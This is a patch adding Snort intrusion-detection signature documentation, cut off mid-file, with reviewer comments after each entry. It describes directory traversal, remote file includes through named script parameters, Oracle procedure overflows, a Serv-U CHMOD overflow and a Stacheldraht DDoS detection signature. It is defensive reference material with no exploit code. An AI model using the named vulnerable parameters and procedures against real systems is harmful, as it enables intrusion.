--- /dev/null
+++ b/doc/signatures/1199.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1199
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
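Review bot: Affected Systems is empty and the text is inconsistent about the protocol: Detailed Information says traversal targets web, web-application and FTP servers, while Attack Scenarios describes only browsing outside the FTP root. State which protocol and port sid 1199 inspects and the path pattern it matches, and either list the affected software or say "any server that does not canonicalise client-supplied paths before use". Additional References is also empty.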
--- /dev/null
+++ b/doc/signatures/100000343.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000343
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "DoceboLMS" application running on a webserver. Access to the file "credits.php" using a remote file being passed as the "lang" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "lang" parameter in the "credits.php" script used by the "DoceboLMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using DoceboLMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
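Review bot: The third paragraph of Detailed Information and the whole Attack Scenarios section are credential-validation boilerplate that does not describe a remote file include: nothing about this bug involves supplying one's own credentials to an authentication mechanism. Replace them with the actual scenario, in which an attacker passes a URL to a file under their control in the "lang" parameter of "credits.php" and the server includes and executes it. Minor: "exploitation attempt has been attempted" in Summary is redundant, "ona web server" should be "on a web server", and the file opens with two blank lines the other files do not have.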
--- /dev/null
+++ b/doc/signatures/1255.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1255
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
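Review bot: This file is word-for-word the generic PHP template (compare the sid 1423 file earlier in this patch) and never identifies what sid 1255 matches; with Affected Systems at "All systems running PHP applications" and an empty Additional References, nothing here distinguishes it from any other PHP-application sid. Add the script or parameter the rule keys on and the product it concerns. "running ona web server" should be "running on a web server".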
--- /dev/null
+++ b/doc/signatures/2700.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2700
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure numtoyminterval.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
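Review bot: Affected Systems reads "Oracle Oracle9i" (duplicated vendor name). Detailed Information says multiple packages are affected but never names the package that contains numtoyminterval, whereas the sid 2816 file in this same patch does name its owning package (sys.dbms_repcat_fla); add the owning package here so a reader can map the alert to a patch. Additional References is empty.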
--- /dev/null
+++ b/doc/signatures/2340.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2340
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability associated with RhinoSoft Serv-u FTP Server CHMOD 
+command. 
+
+--
+Impact:
+Remote access.  A successful attack may permit the remote execution of 
+arbitrary commands with system privileges.
+
+--
+Detailed Information:
+Serv-u offers FTP servers for Windows hosts. A vulnerability exists 
+with the CHMOD command that can cause a buffer overflow and permit the 
+execution of arbitrary commands with system privileges. The buffer 
+overflow can be caused by supplying an overly long argument to the CHMOD 
+command.
+
+--
+Affected Systems:
+	RhinoSoft Serv-u FTP Server prior to version 4.2 
+
+--
+Attack Scenarios:
+An attacker can supply an overly long file argument with the CHMOD 
+command, causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
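Review bot: Impact and Detailed Information both say the overflow permits "execution of arbitrary commands with system privileges"; an overlong-argument buffer overflow yields arbitrary code execution, and "commands" suggests a command-injection bug, so use "arbitrary code" in both places. Clarify whether the rule matches the argument to a bare CHMOD verb or CHMOD issued as a SITE subcommand, since that affects what traffic triggers it. Additional References is empty.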
--- /dev/null
+++ b/doc/signatures/1639.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid: 1639
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+IRC Protocol
+http://www.irchelp.org/irchelp/rfc/
+
+--
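Review bot: This file has no Affected Systems section at all (Detailed Information runs straight into Attack Scenarios), and "Sid: 1639" puts the value on the label line where every other file puts it on the following line. The Summary speaks of "network chat clients" in general while the only reference is the IRC protocol; name the protocol or client whose traffic sid 1639 detects. "unkown" should be "unknown".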
--- /dev/null
+++ b/doc/signatures/2816.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2816
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_object_from_flavor
+. This procedure is included in
+sys.dbms_repcat_fla.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
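Review bot: The sentence naming the vulnerable procedure is broken across lines so that one line begins with ". This procedure is included in"; join it to read "vulnerability in the procedure drop_object_from_flavor. This procedure is included in sys.dbms_repcat_fla." Affected Systems repeats the vendor name ("Oracle Oracle9i"), and Additional References is empty.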
--- /dev/null
+++ b/doc/signatures/226.txt
@@ -0,0 +1,65 @@
+Rule:
+--
+Sid:
+226
+
+--
+Summary:
+This event indicates that a Stacheldraht handler exists on the source host and an agent on the destination host.
+
+--
+Impact:
+Serious. A Distributed Denial of Service attack maybe in progress.
+
+--
+Detailed Information:
+The Stacheldraht DDoS uses a tiered structure of compromised hosts to 
+coordinate and participate in a denial of service attack.  There are 
+"handler" hosts that are used to coordinate the attacks and "agent" 
+hosts that launch the attack.  When a host becomes a Stacheldraht agent 
+it makes an initial contact with each of its known handlers.  A handler 
+should respond with an ICMP echo reply with an ICMP identification 
+number of 667 and a string of "ficken" in the payload. 
+
+--
+Affected Systems:
+Any Stacheldraht compromised host.
+
+--
+Attack Scenarios:
+A host on which a Stacheldraht agent has been installed attempts to 
+contact the list of known handlers.   
+
+--
+Ease of Attack:
+Simple. Stacheldraht code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Turn of all unnecessary services on hosts.
+
+Upgrade to the latest patch level.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS191
+
+--
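Review bot: Typos: "maybe in progress" in Impact should be "may be in progress", and "Turn of all unnecessary services" in Corrective Action should be "Turn off". The Corrective Action is generic hardening, but Detailed Information already tells the reader that the matched reply (ICMP id 667, "ficken" payload) identifies the source as a handler and the destination as a compromised agent; add that both hosts should be isolated and investigated. The `Rule:` header is immediately followed by `--` with no blank line, unlike the other files.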
--- /dev/null
+++ b/doc/signatures/1427.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1427
+
+--
+Summary:
+This event is generated when an attempt is made to attack a device using SNMP v1.
+
+--
+Impact:
+Varies depending on the implementation. Ranges from Denial of Service (DoS) to code execution.
+
+--
+Detailed Information:
+SNMP is a widely adopted protocol for managing IP networks, including individual network devices, and devices in aggregate. 
+
+Several network devices come pre-installed with this protocol for management and monitoring.
+
+A number of vulnerabilities exist in SNMP v1, including a community string 
+buffer overflow, that will allow an attacker to execute arbitrary code or shutdown the service.
+
+--
+Affected Systems:
+Any implementation of SNMP v1 protocol
+	
+--
+Attack Scenarios:
+An attacker needs to send a specially crafted packet to UDP port 161 
+of a vulnerable device, causing a Denial of Service or possible execution of 
+arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable the SNMP v1 protocol, use SNMP v2 protocol as an alternative.
+
+Disable the use of SNMP for devices that do not need it.
+
+Use Ingress/Egress filtering on a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Nawapong Nakjang (tony@ksc.net, tonie@thai.com)
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-03.html
+
+--
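Review bot: Corrective Action recommends SNMP v2 as the alternative to v1, but v2c still authenticates with a cleartext community string, the very field Detailed Information flags as the overflow vector; recommend SNMPv3 (authenticated and encrypted) or, where that is not available, restricting which hosts may reach UDP 161 at all, rather than implying a version bump alone fixes it. "Use Ingress/Egress filtering on a packet filtering firewall" should say what to filter (UDP 161 from untrusted networks). Attack Scenarios' "An attacker needs to send" reads oddly; "An attacker sends" is enough. There is a stray tab on the line after "Any implementation of SNMP v1 protocol".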
--- /dev/null
+++ b/doc/signatures/1535.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1535
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
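Review bot: Like the sid 1423 and 1255 files in this patch, this is the unmodified generic template (here with "CGI" substituted for "PHP") and does not say which script, parameter or product sid 1535 inspects; Affected Systems "All systems running CGI applications" and an empty Additional References leave the analyst nothing to act on. Add the specific match target. "running ona web server" should be "running on a web server".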
--- /dev/null
+++ b/doc/signatures/100000830.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000830
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "HiveMail" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "dayprune" parameter in the "index.php" script used by the "HiveMail" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using HiveMail
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
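Review bot: Impact and the second paragraph of Detailed Information are copied from the remote-file-include template ("system integrity compromise", "administrative access to the server", "execute system binaries") and overstate a cross-site scripting bug; the realistic impact is script execution in the victim user's browser, theft of the HiveMail session or credentials, and actions performed as that user, which is what the Attack Scenarios line already describes. Rewrite those two sections to match. Also the "Sid:" value and the Affected Systems entry are not followed by a blank line before `--`, unlike the other files.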
--- /dev/null
+++ b/doc/signatures/100000581.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000581
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "cat_view_hidden.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"cat_view_hidden.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
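Review bot: As in the other remote-file-include entries in this patch, the third paragraph of Detailed Information and the Attack Scenarios section describe credential validation and "supplying his/her own credentials", which has nothing to do with a remote include via "admin_template_path" in "cat_view_hidden.php"; replace them with the actual scenario in which the attacker passes a URL to a file they control and the server includes and executes it. "exploitation attempt has been attempted" is redundant, "ona web server" should be "on a web server", and Additional References is empty.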
--- /dev/null
+++ b/doc/signatures/1234.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1234
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
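Review bot: This page never says what pattern or URI sid 1234 matches; with Detailed Information saying only that "attack scenarios are legion", Affected Systems at "All systems using a web server" and an empty Additional References, it is indistinguishable from the other generic web-application files in this patch. Add the request element the rule inspects and the product or vendor advisory it is tied to.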
--- /dev/null
+++ b/doc/signatures/3122.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3122
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
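Review bot: Affected Systems lists "Microsoft Windows Server 2000", which is not a product name (the product is Windows 2000 Server), and "Microsoft Windows NT Server" should give the version. Attack Scenarios says the attacker supplies "extra data in the message ... containing code", while Detailed Information locates the bug in processing the message length; describe the mismatch between the declared length and the data actually sent so the two sections agree. There is a stray blank line between `--` and "Corrective Action:", and Additional References is empty for a vulnerability that has a vendor bulletin.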
--- /dev/null
+++ b/doc/signatures/3455.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+3455
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Bontago Game Server.
+
+--
+Impact:
+Serious. Code execution and Denial of Service (DoS) are possible.
+
+--
+Detailed Information:
+The Bontago game server does not properly sanitize user nicknames.
+Sucessful exploitation of this error may present an attacker with the
+opportunity to overflow a buffer which may then lead to remote code
+execution and possible DoS.
+
+--
+Affected Systems:
+	Bontago Game Server 1.1 and prior
+
+--
+Attack Scenarios:
+An attacker can supply a nickname to the server that exceeds the static
+buffer length assigned to handle this value.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
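Review bot: "Sucessful" in Detailed Information should be "Successful". The "Rule:" field is empty, so a reader cannot see what content triggers SID 3455 or relate the "static buffer length" mentioned in Attack Scenarios to the nickname length the rule actually checks; the rule text should be included, as 2486.txt in this same patch does. "Additional References:" is also empty although Affected Systems gives a precise version ("Bontago Game Server 1.1 and prior"); the advisory that figure was taken from should be cited.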
--- /dev/null
+++ b/doc/signatures/1129.txt
@@ -0,0 +1,75 @@
+Rule:
+--
+Sid:
+1129
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+".htaccess" from a web server.
+
+--
+Impact:
+If this request is successful, it could provide an attacker with 
+valuable information needed to compromise the website.
+
+--
+Detailed Information:
+Most UNIX based web servers, such as Apache and Netscape Enterprise 
+Server, use ".htaccess" files to customize security settings on a 
+per-directory level. These files can specify things like what users 
+have access to what resources, hosts that are allowed or denied, and 
+what type of authentication system to use.   This type of data would be 
+most useful for carrying out an attack on the site.   Fortunately, all 
+modern web servers deny client access to these files by default.
+
+--
+Affected Systems:
+Any system that uses ".htaccess" files and which have misconfigured the 
+server to allow client access to them.
+
+--
+Attack Scenarios:
+This is an information gathering operation which could facilitate an 
+attack.
+
+--
+Ease of Attack:
+It is simple to send a request for this file, but the request would only
+be successful if the file exists and the server allows access to it.
+
+--
+False Positives:
+While unlikely, certain web servers that are set up to host multiple 
+users' sites may allow access to this file by the site owners.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+First determine if the attack is successful by requesting the file 
+yourself. If the request is granted, ensure that your web server is 
+configured to deny access to all files that begin with ".ht".
+
+The default configuration for the Apache HTTP Server should include the 
+following section to prevent access to .ht files:
+
+<Files ~ "^\.ht">
+    Order allow,deny
+    Deny from all
+</Files>
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Kevin Peuhkurinen
+-- 
+Additional References:
+
+Webdeveloper.com
+http://www.webdeveloper.com/servers/servers_htaccess_magic.html
+
+--
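Review bot: The Apache snippet under Corrective Action uses the "Order allow,deny" / "Deny from all" access-control form without stating which Apache release series it was verified against; since the text claims this is what "the default configuration ... should include", the applicable version should be named so that readers on a different series do not paste a block their server ignores. Minor consistency points: "Rule:" at the top is followed directly by "--" with no blank line and no rule text, the separator after Contributors has trailing whitespace, and the reference label reads "Webdeveloper.com" without the trailing colon the other files use ("Bugtraq:", "Microsoft:").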
--- /dev/null
+++ b/doc/signatures/2803.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2803
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_instantiation
+. This procedure is included in
+dbms_repcat_rgt.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
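Review bot: The procedure name in Detailed Information is broken across lines with a stray leading period ("drop_site_instantiation" / ". This procedure is included in" / "dbms_repcat_rgt."), which reads as though the name were unfinished; it should be one sentence: "... in the procedure drop_site_instantiation. This procedure is included in dbms_repcat_rgt." Also "Oracle Oracle9i" doubles the vendor name, "None Known" differs in capitalisation and punctuation from the "None known." used elsewhere in this patch, and "Apply the appropriate vendor supplied patch" lacks a full stop. "Additional References:" is empty for a vulnerability with a specific procedure and package name; the Oracle alert it was taken from should be cited.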
--- /dev/null
+++ b/doc/signatures/100000673.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000673
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "web_statsConfig.php" using a remote file being passed as 
